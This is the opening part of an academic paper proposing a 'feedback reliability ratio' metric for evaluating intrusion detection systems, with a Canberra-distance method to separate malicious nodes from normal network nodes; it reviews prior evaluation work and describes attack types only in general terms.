{"ft_lang_label":"__label__en","ft_lang_prob":0.90344423,"math_prob":0.9352916,"size":27638,"snap":"2021-31-2021-39","text_gpt3_token_len":5831,"char_repetition_ratio":0.21668959,"word_repetition_ratio":0.09758167,"special_character_ratio":0.20558651,"punctuation_ratio":0.085278794,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.989127,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-18T13:03:54Z\",\"WARC-Record-ID\":\"<urn:uuid:c0385793-9377-40cd-8542-dd27b2618fdd>\",\"Content-Length\":\"50256\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:87de366e-6bc7-4f78-b313-26a84747f8a1>\",\"WARC-Concurrent-To\":\"<urn:uuid:81a36ff5-2e51-47f9-b33a-2d8f91b4c342>\",\"WARC-IP-Address\":\"5.61.51.234\",\"WARC-Target-URI\":\"https://knihyzacal.com/terminal-value-gordon-growth-model-daah/too1334oqpx0\",\"WARC-Payload-Digest\":\"sha1:V7VL45QNFISZ4EIKO2I7CU2J3GSMUJZG\",\"WARC-Block-Digest\":\"sha1:Q7HP33AH2YKLBQO7YNNOVL6XMVCGWESG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780056476.66_warc_CC-MAIN-20210918123546-20210918153546-00275.warc.gz\"}"}
https://stackoverflow.com/questions/16519644/if-statement-is-being-missed-in-bank-account-class
[ "# If statement is being missed in Bank Account Class?\n\nI am having some issues with the following syntax.\n\nI am currently learning Java and have been going through a past exam paper to help build my knowledge of Java.\n\nHere is the question:\n\nWrite a class Account that has instance variables for the account number and current balance of the account. Implement a constructor and methods getAccountNumber(), getBalance(), debit(double amount) and credit(double amount). In your implementations of debit and credit, check that the specified amount is positive and that an overdraft would not be caused in the debit method. Return false in these cases. Otherwise, update the balance.\n\nI have attempted to do this HOWEVER, I have not implemented the boolean functions for debit and credit methods. I just wanted to build the program first and attempt to get it working. I was going to look at this after as I was not sure how to return true or false whilst also trying to return an amount from the said methods.\n\nPlease forgive any errors in my code as I am still learning Java.\n\nI can run my code, but when I enter deposit it does not seem to work correctly and I would appreciate any pointers here please.\n\nHere is my code:\n\n``````import java.util.*;\n\npublic class Account {\n\nprivate int accountNumber;\nprivate static double currentBalance;\nprivate static double debit;\n\n// ***** CONSTRUCTOR *****//\npublic Account(double currentBalance, int accountNumber) {\naccountNumber = 12345;\ncurrentBalance = 10000.00;\n}\n\npublic int getAccountNumber(int accountNumber) {\nthis.accountNumber = accountNumber;\nreturn accountNumber;\n}\n\npublic double getcurrentBalance(double currentBalance) {\nthis.currentBalance = currentBalance;\nreturn currentBalance;\n}\n\npublic static double debit(double currentBalance, double amount) {\ncurrentBalance -= amount;\nreturn currentBalance;\n}\n\npublic static double credit(double currentBalance, double amount) {\ncurrentBalance += amount;\nreturn currentBalance;\n}\n\npublic static void main(String [] args){\nString withdraw = \"Withdraw\";\nString deposit = \"Deposit\";\ndouble amount;\nScanner in = new Scanner(System.in);\nSystem.out.println(\"Are you withdrawing or depositing? \");\nString userInput = in.nextLine();\nif(userInput == withdraw)\nSystem.out.println(\"Enter amount to withdraw: \");\namount = in.nextDouble();\nif(amount > currentBalance)\n\ndebit(currentBalance, amount);\n\nSystem.out.println(\"Your new balance is: \" + currentBalance);\n\nif (userInput == deposit)\nSystem.out.println(\"Enter amount to deposit: \");\namount = in.nextDouble();\ncredit(currentBalance, amount);\n\nSystem.out.println(\"Your new balance is: \" + currentBalance);\n\n}\n}\n``````\n\nAgain please forgive any errors in my code. I am still learning its syntax.\n\n• This is not python. Place brackets for your ifs – Boris Strandjev May 13 '13 at 10:20\n• That was some very bad advice. – Marko Topolnik May 13 '13 at 10:21\n• Your debit and credit methods should return a boolean. – Adegoke A May 13 '13 at 10:21\n• @PrimalScientist Its not required if you only need to execute one statement. Even though, its always recommended to use them – Evans May 13 '13 at 10:22\n• Never use `==` for String comparison. Use `equals()`. – Axel May 13 '13 at 10:22\n\nIn the if-statement `if(userInput == withdraw)` you are attempting to compare `String` objects.\n\nIn Java to compare `String` objects the `equals` method is used instead of the comparison operator `==`\n\n``````if(userInput.equals(withdraw))\n``````\n\nThere are several instances in the code that compares `String` objects using `==` change these to use `equals`.\n\nAlso when using conditional blocks it is best to surround the block with braces `{}`\n\n``````if(true){\n\n}\n``````\n• This is great. Thank you for this. – PrimalScientist May 13 '13 at 10:24\n• @PrimalScientist I'm glad I can help. It looks like you keep your code pretty neat and organized. Keep it up! The braces will help make it more readable also. – Kevin Bowersox May 13 '13 at 10:29\n• @PrimalScientist you can also use `if(userInput.equalsIgnoreCase(\"withdraw\"))` – Adegoke A May 13 '13 at 10:35\n• Many thanks for your feedback. I have never seen this syntax before!! – PrimalScientist May 13 '13 at 10:35\n• Thanks Kevin. I will =] – PrimalScientist May 13 '13 at 10:41\n\nYou don't use brackets so only the first line after your if-statement gets executed. Also, String's should be compared using `.equals(otherString)`. Like this:\n\n``````if(userInput.equals(withdraw))\nSystem.out.println(\"Enter amount to withdraw: \"); //Only executed if userInput == withdraw\namount = in.nextDouble(); //Always executed\n\nif(userInput.equals(withdraw)) {\nSystem.out.println(\"Enter amount to withdraw: \");\namount = in.nextDouble();\n//All executed\n}\n``````\n\nDo this:\n\n``````if(userInput.equals(withdraw)) {\nSystem.out.println(\"Enter amount to withdraw: \");\namount = in.nextDouble();\nif(amount > currentBalance)\n\ndebit(currentBalance, amount);\nSystem.out.println(\"Your new balance is: \" + currentBalance);\n}\n\nif (userInput.equals(deposit)) {\nSystem.out.println(\"Enter amount to deposit: \");\namount = in.nextDouble();\ncredit(currentBalance, amount);\nSystem.out.println(\"Your new balance is: \" + currentBalance);\n}\n``````\n\nNote that if your amount to withdraw exceeds your current balance, you will get a 'warning message' but your withdrawal will continue. Thus you'll end up with a negative sum of money. If you don't want to do this, you have to change it accordingly. But, this way it shows how the use of brackets (or not using them) has different effects.\n\n• Hmm, ok thank you for your feedback. – PrimalScientist May 13 '13 at 10:21\n• @Joetjah Note; in your answer you are still using string == which will not work: stackoverflow.com/questions/513832/… – Richard Tingle May 13 '13 at 10:25\n• Changed as such. – Joetjah May 13 '13 at 10:26\n• Well, what you can do is only return a boolean, since your `currentBalance` is class-wide anyway, you can get the change of money. Like so: `if (debit(currentBalance, amount)) { System.out.println(\"Your money has been decreased to \" + currentBalance); } else { System.out.println(\"Transaction cancelled.\"); }` – Joetjah May 13 '13 at 10:31\n• If you really want to return 2 values, you have to create an object or class that encapsulates both. stackoverflow.com/questions/457629/… I wouldn't do that in this setting though. – Joetjah May 13 '13 at 10:32\n``````if (userInput == deposit)\n``````\n\nshould be\n\n``````if (userInput.equals(deposit))\n``````\n\nSame for withdrawal.\n\n• Thank you for this. Great help here. – PrimalScientist May 13 '13 at 10:24\n\nOn these methods:\n\n``````public static double debit(double currentBalance, double amount) {\ncurrentBalance -= amount;\nreturn currentBalance;\n}\n\npublic static double credit(double currentBalance, double amount) {\ncurrentBalance += amount;\nreturn currentBalance;\n}\n``````\n\nThe inputs to the functions really shouldn't include the current balance, the object already knows what the current balance is (its being held in the objects currentBalance field, which as has been pointed out shouldn't be static).\n\nImagine a real cash machine that behaved like this:\n\n``````Whats my current balance:\n£100\nCreditAccount(\"I promise my current balance is £1 Million, it really is\", £10):\nBalance:£1,000,010\n``````\n\nEdit: Include code to behave like this\n\n``````import java.util.*;\n\npublic class Account {\n\nprivate int accountNumber;\nprivate double currentBalance; //balance kept track of internally\n\n// ***** CONSTRUCTOR *****//\n\npublic Account(int accountNumber, double currentBalance) {\nthis.accountNumber = accountNumber;\nthis.currentBalance = currentBalance;\n}\n\npublic int getAccountNumber() {\nreturn accountNumber;\n}\n\npublic double getcurrentBalance() {\nreturn currentBalance;\n}\n\npublic boolean debit(double amount) {\n//we just refer to the objects fields and they are changed\n\nif (currentBalance<amount){\nreturn false; //transaction rejected\n}else{\ncurrentBalance -= amount;\nreturn true;\n//transaction approaved and occured\n}\n\n//Note how I directly change currentBalance, there is no need to have it as either an input or an output\n\n}\n\npublic void credit( double amount) {\n//credits will always go through, no need for return boolean\ncurrentBalance += amount;\n\n//Note how I directly change currentBalance, there is no need to have it as either an input or an output\n}\n\npublic static void main(String [] args){\nAccount acc=new Account(1234,1000);\n\nacc.credit(100);\n\nSystem.out.println(\"Current ballance is \" + acc.getcurrentBalance());\n\nboolean success=acc.debit(900); //there is enough funds, will succeed\n\nSystem.out.println(\"Current ballance is \" + acc.getcurrentBalance());\nSystem.out.println(\"Transaction succeeded: \" + success);\n\nsuccess=acc.debit(900); //will fail as not enough funds\n\nSystem.out.println(\"Current ballance is \" + acc.getcurrentBalance());\nSystem.out.println(\"Transaction succeeded: \" + success);\n\n}\n}\n``````\n\nI've not bothered using the typed input because you seem to have the hang of that\n\n• Many thanks for your feedback. How else could I amend the currentBalance variable though? Or would by returning the amount do this automatically? – PrimalScientist May 13 '13 at 10:47\n• @PrimalScientist I've updated my answer to answer as an example but basically a non static method can access any non static field of the class (i.e. any account method can access accountNumber and currentBalance). Thats one of the founding principles of Object Orientated code – Richard Tingle May 13 '13 at 11:00\n• Nice one. Many thanks Richard. Again great feedback. – PrimalScientist May 13 '13 at 11:01\n• Yes I see this now. Quick question Richard, here you have created a new object: Account acc=new Account(1234,1000); So this is the account number and the amount in the bank. I could also amend the code to take user input and amend accordingly. – PrimalScientist May 13 '13 at 17:04\n• Of course, the most sensible way would probably be to ask the user for that information and then create the object using the constructor. But you could equally create a blank constructor and them give it the information piece by piece. The choice is yours but its generally considered good practice for an object to recieve the information it needs to work in the constructor (so an object is garanteed to work if it exists, rather than \"You've forgotton to to call these 3 methods after construction hence your problem\") – Richard Tingle May 13 '13 at 17:19\n\nWithout '{' and '}' the first line after an if statement only gets executed as part of that statement. Also, your `if (userInput == deposit)` block isn't correctly indented, it shouldn't be under the `if (userInput == withdraw)`. And string comparisons should be done using `userInput.equals(withdraw)`\n\nFor the debit and credit methods:\n\n``````public static boolean debit(double currentBalance, double amount) {\ncurrentBalance -= amount;\nif<currentBalance < 0){\nreturn false\n}\nreturn true;\n}\n\npublic static boolean credit(double currentBalance, double amount) {\ncurrentBalance += amount;\nif<currentBalance > 0){\nreturn false\n}\nreturn true;\n}\n``````\n\nNow I think I have the boolean values mixed up. The description is a little bit unclear on what to return for each method.\n\nUse equals() method instead == which compares the equality of Objetcs rather values\n\n``````import java.util.*;\n\npublic class Account{\n\nprivate int accountNumber;\nprivate static double currentBalance;\nprivate static double debit;\n\n// ***** CONSTRUCTOR *****//\npublic Account(double currentBalance, int accountNumber) {\naccountNumber = 12345;\ncurrentBalance = 10000.00;\n}\n\npublic int getAccountNumber(int accountNumber) {\nthis.accountNumber = accountNumber;\nreturn accountNumber;\n}\n\npublic double getcurrentBalance(double currentBalance) {\nthis.currentBalance = currentBalance;\nreturn currentBalance;\n}\n\npublic static double debit(double currentBalance, double amount) {\ncurrentBalance -= amount;\nreturn currentBalance;\n}\n\npublic static double credit(double currentBalance, double amount) {\ncurrentBalance += amount;\nreturn currentBalance;\n}\n\npublic static void main(String [] args){\nString withdraw = \"Withdraw\";\nString deposit = \"Deposit\";\ndouble amount;\nScanner in = new Scanner(System.in);\nSystem.out.println(\"Are you withdrawing or depositing? \");\nString userInput = in.nextLine();\nif(userInput.equals(withdraw))\nSystem.out.println(\"Enter amount to withdraw: \");\namount = in.nextDouble();\nif(amount > currentBalance)\n\ndebit(currentBalance, amount);\n\nSystem.out.println(\"Your new balance is: \" + currentBalance);\n\nif (userInput .equals(deposit))\nSystem.out.println(\"Enter amount to deposit: \");\namount = in.nextDouble();\ncredit(currentBalance, amount);\n\nSystem.out.println(\"Your new balance is: \" + currentBalance);\n\n}\n}\n``````\n• Ahh many thanks. I can see the amendments there. Very helpful. – PrimalScientist May 13 '13 at 10:26" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8450096,"math_prob":0.7375253,"size":2765,"snap":"2019-26-2019-30","text_gpt3_token_len":565,"char_repetition_ratio":0.18326694,"word_repetition_ratio":0.048346058,"special_character_ratio":0.22640145,"punctuation_ratio":0.17879418,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9576026,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-17T11:39:57Z\",\"WARC-Record-ID\":\"<urn:uuid:586468e6-026e-49e4-9472-bb393945d951>\",\"Content-Length\":\"193200\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f219c34c-85f8-4b60-97da-202e5c5f64e6>\",\"WARC-Concurrent-To\":\"<urn:uuid:23b64c1a-9bd1-4f3b-b139-4174324ef94f>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://stackoverflow.com/questions/16519644/if-statement-is-being-missed-in-bank-account-class\",\"WARC-Payload-Digest\":\"sha1:PZLVPB4HPP327LDRYD75JCCJPPUDUYQ7\",\"WARC-Block-Digest\":\"sha1:HDAVOIDJRBJ3OZ24PS62BSHFG2O7LJLV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195525136.58_warc_CC-MAIN-20190717101524-20190717123524-00237.warc.gz\"}"}
http://www.qtpschool.com/2012/03/
[ "## Thursday, March 22\n\n### How to track execution time of the script in QTP\n\nHello Friends,\n\nIn this post, we'll see how to measure the total time taken by a test/script in execution.\n\nIt's easy to get execution time using Timer, but here we will measure the time and convert it to Hr-Min-Sec format. Let's see how-\n\nDim StartTime, EndTime\nStartTime = Timer\nFor I = 1 To 5\nwait 1\nNext\nEndTime = Timer\nTimeTaken = EndTime - StartTime\nmsgbox TimeTaken\n\nYou have execution time stored in 'TimeTaken' variable but it is in milisecond format\n\nNow, let's convert it to Hr-Min-Sec. It will clearly tell you how many seconds, minutes or hours (if any :) ) have been taken by the script. Following is the function to do the job for us. Just pass the 'TimeTaken' to it and chill :)\n\nFunction func_ExecutionTime(TimeTaken)\nIf TimeTaken>=3600 Then\nhr=int(TimeTaken/3600)\nrem1=int(TimeTaken mod 3600)\nstr=hr&\" hr \"\nIf rem1>=60 Then\nmin=int(rem1/60)\nsec=int(rem1 mod 60)\nstr=str&min&\" min \"&sec&\" sec.\"\nelse\nsec=rem1\nstr=str&sec&\" sec.\"\nEnd If\nElse If TimeTaken>=60 Then\nmin=int(TimeTaken/60)\nsec=int(TimeTaken mod 60)\nstr=str&min&\" min \"&sec&\" sec.\"\nelse\nsec=TimeTaken\nstr=str&sec&\" sec.\"\nEnd If\nEnd If\nfunc_ExecutionTime = str\nEnd Function\n\nHow to call this function -\n\nTimeTaken_HMS =  func_ExecutionTime(TimeTaken)\nmsgbox TimeTaken_HMS\n\nIf you have multiple actions in your test, you can measure the execution time for every individual action.\n\nPost you comments for any queries/feedback.\n\n## Thursday, March 15\n\n### Generate a random string in QTP/vbscript\n\nHello Friends,\n\nSometime script/application requires some input data as string which is unique. Random strings is helpful is this scenario. Lets see how to generate random input string in qtp.\n\nFunction GenerateRandomString(StrLen)\nDim myStr\nConst MainStr= \"0123456789abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz\"\nFor i = 1 to StrLen\nmyStr=myStr & Mid(MainStr,RandomNumber(1, Len(MainStr)),1)\nNext\nGenerateRandomString = myStr\nEnd Function\n\nHere StrLen(argument) is the required length of the string. Call this function as below-\n\nMsgBox GenerateRandomStrin(6)\n\nIt will generate a string of 6 characters." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7005225,"math_prob":0.87268806,"size":2814,"snap":"2019-51-2020-05","text_gpt3_token_len":803,"char_repetition_ratio":0.14590748,"word_repetition_ratio":0.98623854,"special_character_ratio":0.26226014,"punctuation_ratio":0.07372401,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.953766,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-23T00:33:57Z\",\"WARC-Record-ID\":\"<urn:uuid:4763fd46-2132-4a74-82c3-3214ece832da>\",\"Content-Length\":\"72612\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c8ca4407-553b-4e23-9394-63c5e6d5e925>\",\"WARC-Concurrent-To\":\"<urn:uuid:f8f1728d-42a4-45fd-a88f-8be979dbf3f5>\",\"WARC-IP-Address\":\"172.217.7.147\",\"WARC-Target-URI\":\"http://www.qtpschool.com/2012/03/\",\"WARC-Payload-Digest\":\"sha1:XBHNBUUHVISMS5JCD7MH75DWIZME2BFO\",\"WARC-Block-Digest\":\"sha1:N2DBOYUSLH53VZDVNOTOSVCVKI4VBVYZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250607596.34_warc_CC-MAIN-20200122221541-20200123010541-00271.warc.gz\"}"}
https://learn.careers360.com/jobs/question-find-which-number-has-oddnbspnbspfactors-of-following-numbers-8427/
[ "# Find which number has odd  factors of following numbers Option 1) 1200Option 2) 20000Option 3) 360Option 4) None of theseOption 5) 17100\n\nNumber of factors of 1200=24*31*52=5*2*3 = 30\n\nNumber of factors of 20000 = 25*54 = 6*5 =30\n\nNumber of factors of 360 = 23*32*51 = 4*3*2 = 24\n\nNumber of factors of 17100 = 22*32*52*191 = 3*3*3*2 =54\n\nBoost your Preparation for JEE Main 2021 with Personlized Coaching\n\nExams\nArticles\nQuestions" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.81626624,"math_prob":0.9904027,"size":507,"snap":"2020-45-2020-50","text_gpt3_token_len":220,"char_repetition_ratio":0.26242545,"word_repetition_ratio":0.73913044,"special_character_ratio":0.57593685,"punctuation_ratio":0.0,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9991862,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-01T09:35:10Z\",\"WARC-Record-ID\":\"<urn:uuid:f144750d-035d-47d5-b012-290d78483036>\",\"Content-Length\":\"766034\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:89cd628b-dc55-4897-bd36-29a66d1b7c14>\",\"WARC-Concurrent-To\":\"<urn:uuid:57fec1ca-9756-4e90-9786-14d9b7984b16>\",\"WARC-IP-Address\":\"13.127.40.139\",\"WARC-Target-URI\":\"https://learn.careers360.com/jobs/question-find-which-number-has-oddnbspnbspfactors-of-following-numbers-8427/\",\"WARC-Payload-Digest\":\"sha1:NQMGIJ4PTDNXB5WYC2NSEVZW6E7TWNFH\",\"WARC-Block-Digest\":\"sha1:SPIB3QPV2ACWRN64XAKVDET4HD3PAPHW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141672314.55_warc_CC-MAIN-20201201074047-20201201104047-00408.warc.gz\"}"}
https://www.meraevents.com/event/applied-machine-learning-and-data-analytics
[ "", null, "# Applied Machine Learning and Data Analytics\n\n• ## Special Offer\n\nSale Date Ended\n\nINR 25000\nSold Out\n• ## Early Bird Offer\n\nSale Date Ended\n\nINR 30000\nSold Out\n• ## Entry Pass\n\nSale Date Ended\n\nINR 35000\nSold Out\n\n#### Invite friends\n\nPage Views : 78\n\nCourse Duration:              80 Hours\n\nCourse Evaluation:           Module wise quizzes and a projects\n\nCourse Objective:             This course aims to provide solid understanding of data science theory and applications in business. Focus will be on the underlying scientific concepts while also accounting for recent progress made by the scientific and technical community in the field of data science. The course will draw examples from various case studies and thus emphasis will be on application. Associate shall get a hands-on experience in the application of these techniques for addressing practical problems from retail domain.\n\nInstructor's Bio:\n\nThe course will be conducted by an Assistant Professor at IIT Kharagpur. His teaching interests include non-linear programming, multivariate statistical models, generalized linear models, machine learning and data analytics. He has offered various courses, lectures and workshops on applied machine learning and data analytics at IIT Kharagpur and other premier institute.\n\nCourse Content\n\nModule A: Basics (20 Hours)\n\nA.1         Probability and Statistics basics\n\n1. Sample Space and Events\n2. Random variables\n3. Sampling and distributions\n4. Parameter Estimation\n5. Hypothesis Testing\n6. Multivariate Normal Distribution (Gaussian)\n7. ANOVA, ANCOVA, MANOVA, MANCOVA\n8. Non-parametric Tests\n\nA.2         Matrix Algebra and Random Vectors basics\n\n1. Matrix and Vector Algebra\n2. Positive Definite Matrices\n3. Square Root Matrix\n4. Random Vectors and Matrices\n5. Matrix Inequalities and Maximization\n6. Eigen Values and Eigen vectors\n7. Spectral Decomposition\n8. Singular Value Decomposition (SVD)\n9. Non Negative Matrix Factorization (NMF)\n\nA.3         Multivariable Calculus and optimization basics\n\n1. Multivariate Differential & Integral calculus\n2. Directional Derivatives\n3. Convex/Non-convex functions\n4. Fermat’s Theorem\n5. Lagrange function\n6. KKT conditions\n7. Multivariable Search techniques\n\ni.     Derivative-free: Dichotomous,  Fibonacci, Golden selection\n\nii.     Derivative based: Steepest Descent, Gradient descent, Newton’s method\n\niii.     Random Search: Genetic Algorithm\n\nA.4         Python Programming basics\n\nModule B: Learning Concepts (10 Hours)\n\n1. Supervised and Unsupervised Learning\n3. Model Selection\n4. Cross Validation\n5. VC Dimension\n6. Regularization theory\n\nModule C: Statistical Learning Models (20 Hours)\n\n1. Multivariate Linear regression\n2. Principle and Factor Analysis\n3. Discrimination and Classification\n4. Multivariate normal\n5. Fishers linear discriminant\n6. Clustering\n7. Expectation Maximization\n8. K-means, Hierarchal and DBSCAN\n9. Generalized Linear Models (Exponential Family)\n10. Logistic and Multinomial regression\n11. Poisson regression and log-linear models\n12. Survival models\n\nModule D: Machine Learning Models (30 Hours)\n\n1. Artificial Neural Network\n2. Deep Learning\n3. Support Vector Machines and Kernel Regression\n4. Hidden Markov Models\n5. Decision Trees\n6. Ensemble Methods\n7. Random Forest" ]
[ null, "https://static.meraevents.com/content/eventbanner/134324/header14975496157Uo97.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8369587,"math_prob":0.74019367,"size":1619,"snap":"2023-14-2023-23","text_gpt3_token_len":323,"char_repetition_ratio":0.105882354,"word_repetition_ratio":0.017316017,"special_character_ratio":0.18344657,"punctuation_ratio":0.123188406,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9637115,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-07T12:33:57Z\",\"WARC-Record-ID\":\"<urn:uuid:78d0f324-1897-470e-b135-8bb915d1d3b2>\",\"Content-Length\":\"119212\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ccefb467-0416-474c-bbdb-d3debdc9fce9>\",\"WARC-Concurrent-To\":\"<urn:uuid:65ba0337-d13d-4a98-b947-b62a0b8c4506>\",\"WARC-IP-Address\":\"104.21.69.160\",\"WARC-Target-URI\":\"https://www.meraevents.com/event/applied-machine-learning-and-data-analytics\",\"WARC-Payload-Digest\":\"sha1:5Q2NL73KJAEXCIBOSRNBY3Q5TKG4PL4F\",\"WARC-Block-Digest\":\"sha1:2HFBES7HCRURHCCPGIIGHZLKYAPYVSDO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224653764.55_warc_CC-MAIN-20230607111017-20230607141017-00072.warc.gz\"}"}
https://file.scirp.org/Html/9-7800100_21347.htm
[ "Feedback Reliability Ratio of an Intrusion Detection System\n\nJournal of Information Security\nVol. 3  No. 3 (2012) , Article ID: 21347 , 7 pages DOI:10.4236/jis.2012.33030\n\nFeedback Reliability Ratio of an Intrusion Detection System\n\nUsha Banerjee1*, Gaurav Batra1, K. V. Arya2\n\n1Department of Computer Science and Engineering, College of Engineering Roorkee (COER), Roorkee, India\n\n2Department of ICT, Atal Bihari Vajpayee Indian Institute of Information Technology and Management, Gwalior, India\n\nEmail: *[email protected], [email protected]\n\nReceived May 18, 2012; revised June 14, 2012; accepted June 21, 2012\n\nKeywords: Attacks; Canberra Metric; Feedback; Intrusion Detection; Performance; Reliability\n\nABSTRACT\n\nThe behavior and nature of attacks and threats to computer network systems have been evolving rapidly with the advances in computer security technology. At the same time however, computer criminals and other malicious elements find ways and methods to thwart such protective measures and find techniques of penetrating such secure systems. Therefore adaptability, or the ability to learn and react to a consistently changing threat environment, is a key requirement for modern intrusion detection systems. In this paper we try to develop a novel metric to assess the performance of such intrusion detection systems under the influence of attacks. We propose a new metric called feedback reliability ratio for an intrusion detection system. We further try to modify and use the already available statistical Canberra distance metric and apply it to intrusion detection to quantify the dissimilarity between malicious elements and normal nodes in a network.\n\n1. Introduction\n\nNowadays the risk of attacks in data networks is exponentially rising. Thus, the area of network security is gaining importance for researchers and practioners. Attack could be either from outside or from the inside of a network. Further compared to wired networks, mobile ad-hoc networks have several disadvantages with respect to security the most important being the dynamic nature of such networks. In such networks node act as routers and participate in the routing process following some routing protocol. Till date several routing protocols have been formulated for such networks. However, attackers have been always successful to penetrate and harm such networks. Attacks have been classified by several researchers based on the behavior of attacks. Attacks might be internal or external . External attackers try to hamper network performance using any one of the technique like eavesdropping, message intercepting, replay etc. However, the problem is more severe in case of an internal attacker and thus in such a situation the task to detect the misbehaving node becomes daunting. A single intruder can manage to create havoc in a network. This is referred as an intrusion in the system, where a node or malicious element from within a network tries to hamper the normal functioning of the network. To resolve this cumbersome task various Intrusion Detection Systems (IDS) have been developed, which uses different techniques to identify threats in a network. All the available algorithms are based on some assumptions and consider some measure which determine the misbehaving nature of a node. Different approaches are used to determine an intruder in a system, with every approach having its own merits and demerits . One of the approaches used in intrusion detection system maintains a pre-defined knowledge of intrusion with it. Every time an abnormal activity is encountered, this predefined list of intrusions is checked for a match. But this type of technique can determine only a specified number of intrusions. While this list for intrusions can be updated from time to time, but this static approach known as signature-based intrusion detection , is not considered an efficient approach for real time network systems. Another approach used for the detection of misbehavior of an insider node considers a measure in which a threshold value is set on the basis of normal activities. Then value of the measure is determined for the node considering all of its parameters. If this calculated value shows some deviation from the threshold value, then the node is declared as an intrusion for the system. This kind of approach known as anomaly based detection helps in detecting new threats introduced in the network. Similarly, various other intrusion detection systems are available, but there is no particular measure available which can successfully rank these presently available IDS on the basis of their capability and performance.\n\nIn this paper, a novel approach has been proposed which can predict the performance level of an Intrusion Detection System on the basis of its activities recorded for a particular interval. For this purpose, real time data packets information are captured on a network of both types: pure network data, and data containing various attacks. A statistical approach is adopted in this proposal, known as Canberra metric. Canberra Metric is used to determine dissimilarity between different groups of elements based on various parameters.\n\nPrior Work\n\nVarious attempts have been made in the past to define a reasonable measure which can measure the level of trust for an IDS such that the reliability of an IDS can be calculated and a confidence level can be defined for a particular network. The biggest problem that is yet to be resolved is to decide the key factors to be taken into account for describing and analyzing the performance of an IDS. Various options like false positive, false negative, number of packets observed, number of detections, cost of the maintenance, confidence value etc. have been proposed by researchers. Numerous techniques and methodologies have been adopted by researchers to illustrate and benchmark an IDS.\n\nIn a survey of IDS technologies available have been analyzed and the authors have proposed an evaluation scheme which considered false positive rate, false negative rate, vulnerability etc. as the key dimensions of an intrusion detection system. And showed that these parameters are to be taken into account to analyze and improve the quality of Network IDS. proposed a new measure metric called Intrusion Detection Capability, which considered ratio of the mutual information between the IDS input and output to the entropy of the input and proved it to be a better measuring tool to determine the capability of an IDS. The authors in showed an analysis comparing previously available cost-based approaches and the proposed metric results in a scenario.\n\nThe authors in summarize and present a few test cases to demonstrate various evaluation environment methodologies. A new technology has also been proposed with open source environment which is based on both Artificial Intelligence and real network traffic data. The approach included injecting artificial attacks in the isolated test environment to realize the capability of a system. A similar approach has been adopted by the authors in in which a TCL script is executed in a set environment a TELNET environment and can reveal important information about an IDS and capabilities.\n\nBenchmarking an IDS is not a fully evaluative task and cannot be accomplished by applying some logical technique. Hence, no perfect evaluation methodology has been developed so far to analyze an IDS to be installed on a system . Approaches adopted so far lack depth in one or in another aspect and need some modification looking at the challenges present in real environment at present scenario . Some of those challenges faced in the real-time network are: 1) ever increasing network traffic; 2) the use of encrypted messages to transport malicious information; 3) use of more complex, subtle, and new attack scenarios and many more.\n\n presented a brief description comparing different avail able approaches to evaluate the performance of an Intrusion Detection System. This article concluded on a note that there is lot of scope for further research in this field, as the best suitable approach is yet to be discovered. In this paper, a statistical approach has been proposed to untie the node of the problem explained above. This paper aims at presenting a metric based solution for the evaluation and analysis of the performance and reliability of an IDS. And provide a tool to network intrusion detection system analyst with a tool, which can be used to judge an IDS before installing it on a system. And predictions can be made for IDS regarding its reliability and trust level of its detections and security of data. has previously shown that Canberrra and Chi Square are metrics which could be used in intrusion detection.\n\nThe rest of the paper is organized as follows. Section 2 discusses various statistical techniques available to evaluate similarities and dissimilarities and goes on to discuss how these statistical techniques could be applied to the field of intrusion detection. Section 3 presents the approach that we have followed. In Section 4 we present the mathematical and programmatical implementation of the problem. Section 5 deals with results and discussions.\n\n2. Statistical Techniques\n\nStatistics deals with huge volumes of data and has several established techniques to analyze the data based on their similarity or dissimilarity. In huge volumes of data a small anomaly can be easily identified from historical data. This phenomenon can be adapted to network intrusion detection. Since warnings are based on actual usage patterns, statistical systems can adapt to behaviors and 